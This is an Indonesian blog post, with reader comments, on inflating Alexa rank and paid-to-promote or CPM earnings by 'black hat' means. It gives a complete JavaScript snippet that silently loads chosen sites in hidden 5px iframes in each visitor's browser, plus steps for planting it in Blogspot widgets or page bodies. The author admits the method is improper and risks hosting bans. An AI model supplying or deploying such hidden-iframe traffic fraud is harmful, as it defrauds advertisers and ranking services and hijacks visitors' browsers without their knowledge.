24/12/11

Cara Cepat Menaikkan Traffic dan Alexa Rank Dengan Cara Tidak Benar

7 komentar

Cara Cepat Menaikkan Traffic dan Alexa Rank Dengan Cara Tidak Benar - Alexa Rank adalah situs untuk menempatkan ranking website kita melalui visitor, nah disini saya akan menjelaskan cara menaikkan alexa rank dengan cara gak bener alias memakai cara black hat. Alexa Rank sebenarnya tidak mengetahui mana pengunjung bot (robot) atau real visitor (human), nah saya akan membagikan script java untuk memboost alexa rank anda dengan cepat.

Kode script ini juga bisa menambah earning anda, traffic dan juga kalau bermain Paid-To-Promote yang nota bene setiap orang mengunjungi situs reff kita dapat uang? Nah ini juga bisa menjadi senjata anda untuk mendapatkan banyak uang (uang haram gak yaa??)

http://xsltcache.alexa.com/site_stats/gif/s/a/ZmFpcnV6LndlYi5pZA==/s.gif

Kode Script


Pertama - tama copy dan paste teks javascript ini (Ambil dari forum BHW) :
<script type="text/javascript">// <![CDATA[
var sLocation = document.referrer.toLocaleLowerCase();
//Links to boost
var rDomains = ["domain anda(.com)","domain anda2(.com)","domain3 anda(.com)"];//Allowed domain referrer
var aDomains = [".com"];
var valid = 0;

//Valid referrer
for (i=0;i<aDomains.length;i++) { //Check referrer if (sLocation.indexOf(aDomains[i], 0) > -1)
{
valid = 1;
break;
}
}

//Valid referrer
if (valid == 1)
{
//Loop
for (i=0;i<rDomains.length;i++) {
//alert(rDomains[i]);
invisibleWindow("mydiv" + i,rDomains[i]);
}
}

function invisibleWindow(iframeID, url) {
divel = document.createElement("div");
divel.id = "div" + iframeID;
divel.style.width = "5px";
divel.style.height = "5px";
divel.style.visibility = "hidden";

//Add div
document.body.appendChild(divel);

domiframe = document.createElement("iframe");
domiframe.id = iframeID;
domiframe.src = url;
domiframe.style.width = "5px";
domiframe.style.height = "5px";
domiframe.style.visibility = "hidden";

var divid = document.getElementById("div" + iframeID);
divid.appendChild(domiframe);
}
// ]]></script>

Penjelasannya :


var rDomains = ["http://domain anda(.com)","http://domain anda2(.com)","http://domain3 anda(.com)"];

Ganti kode domain anda(.com) dengan nama domain anda atau url web anda(contoh : http://fairuz.web.id). Kode ini yang akan membuat url yang kita masukkan akan dibuka secara diam - diam (silently) dan bisa anda buat berulang - ulang dengan menambahkan dibelakang domain3 anda(.com). Warning : Jangan lupa tambahkan http:// di depan domain anda.
var aDomains = [".com"];

Ini adalah reffer check atau dimana orang menemukan situs kita melalui url atau redirek. Jika script ini anda inginkan untuk visitor dari google atau yahoo tinggal diganti tulisan .com dengan url reffer anda (contoh : google.com).

Cara Pemasangan :


Blogspot
  1. Tinggal tambahkan widget di blogger dan cari yang HTML/JavaScript dan paste kode tersebut (jangan lupa jangan diberi nama widget anda)

Yang Lain :

Buka file website anda (ex: .html or .php) cari tag <body> lalu pastekan kode anda dibawah body.

Kelebihan atau Kegunaan


  1. Cara Cepat Menaikkan atau Melangsingkan Rank dari Alexa Rank website kita.
  2. Dapat Earning tinggi dari CPM atau PTP
  3. Kode script tidak akan terlihat karena menggunakan iframe 1x1

Efek Samping atau Resiko


  1. Untuk pengguna Hosting Berbayar atau Shared Hosting akan mempercepat anda untuk mendapatkan suspensi atau suspend bahkan terbanned!
  2. Mempercepat anda terbanned

Setiap anda menambahkan url domain anda di var rDomains anda akan mendapatkan visitor x banyak url domain (contoh : saya memasukkan 10 url dan website saya mendapatkan 100 visitor per hari maka visitor yang saya dapatkan dari website target urlnya adalah 10 x 100 = 1000 visitor per hari!)

Begitulah Cara Cepat Menaikkan Traffic dan Alexa Dengan Cara Tidak Benar.. Sekali lagi saya tidak bertanggung jawab dan Use At Your Own RisK! Saya juga tidak memakai cara ini karena saya sedang belajar mengenai seo bukan black hat seo. (sumber:http://itsmefurzy.blogspot.com/)

7 Responses so far

  1. Punggawa says:

    Enggak berani ah boss... efeknya mengerikan!! hehehe

  2. Anonim says:

    Ada bot / software utk menaikkan pagerank Alexa bos? kalo punya, jangan sungkan dibagi yah :D

  3. Rawan tu sob.....

    hikhikhikhikhik.....
    http://bangvandawablog.blogspot.com

  4. zainal says:

    naen SEO ja gan. .lebih aman

  5. terimakasih gan atas infonya salam kenal yah gan
    maaf gan numpang promonya yah
    rajalistrik.com ialah toko online kami yang menjual produk-produk teknik industri terbesar, terlengkap, termurah, dan terpercaya di Indonesia yang menawarkan lebih dari 200.000 item produk dari kurang lebih 200 merek. rajalistrik.com berupaya memudahkan Anda untuk mendapatkan produk-produk teknik yang Anda inginkan dengan jaminan orisinalitas, kemudahan bertransaksi, kecepatan pengiriman, dan harga yang kompetitif.http://rajalistrik.com/

  6. Waduh gan....
    ngasih elmu kok yang beresiko, jd takut ane hehehe
    pdhl lg nyari cara naekin rank alexa nih
    btw nambah pengetahuan juga

  7. kebetulan blog saya bukan untuk bisnis.. cuma manaik-kan traffic kan ndak masalah :D

    http://tutorial.koneksidewa.com

Leave a Reply